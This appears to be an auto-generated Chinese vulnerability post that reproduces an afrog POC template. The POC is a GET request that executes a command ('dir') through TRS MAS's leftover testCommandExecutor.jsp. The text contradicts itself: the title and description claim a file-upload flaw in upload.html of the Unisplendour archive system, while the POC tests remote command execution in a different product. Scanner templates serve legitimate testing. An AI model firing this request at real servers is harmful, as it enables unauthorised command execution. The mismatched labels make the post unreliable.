紫光档案管理系统 uploadhtml 后台文件上传漏洞

漏洞信息

漏洞名称: 紫光档案管理系统 upload.html 后台文件上传漏洞

漏洞类型: 文件上传

漏洞等级: 高危

漏洞描述: 紫光档案管理系统是由拓尔思开发的一款媒资管理系统,广泛应用于企业和机构中,用于管理和存储媒体资源。该系统提供了一个web界面,方便用户进行媒资的上传、管理和检索。然而,系统中存在一个严重的文件上传漏洞,具体位于upload.html后台页面。攻击者可以利用这个漏洞上传恶意文件,进而可能获取服务器权限。漏洞的根源在于系统未能对上传的文件进行充分的验证和过滤,导致攻击者可以上传包含恶意代码的文件。由于该漏洞位于后台管理界面,攻击者可能需要一定的权限才能利用此漏洞,但一旦利用成功,将导致服务器被完全控制,数据泄露和服务中断等严重后果。

产品厂商: 拓尔思

产品名称: MAS媒资管理系统

来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2Fvulnerability%2Fmax-test-command-executor-rce.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

id: max-test-command-executor-rce

info:
name: 紫光档案管理系统 upload.html 后台文件上传漏洞
author: zan8in
severity: high
verified: true
description: |
拓尔思 MAS testCommandExecutor.jsp测试文件存在远程命令执行漏洞,当网站运维者未删除测试文件时,攻击者通过漏洞可以获取服务器权限
"MAS媒资管理系统登录页面"

rules:
r0:
request:
method: GET
path: /mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=
expression: response.status == 200 && response.body.ibcontains(b'D:\\TRS\\TRSMAS\\')
expression: r0()



紫光档案管理系统 uploadhtml 后台文件上传漏洞
http://example.com/2025/07/25/github_2304314976/
作者
lianccc
发布于
2025年7月25日
许可协议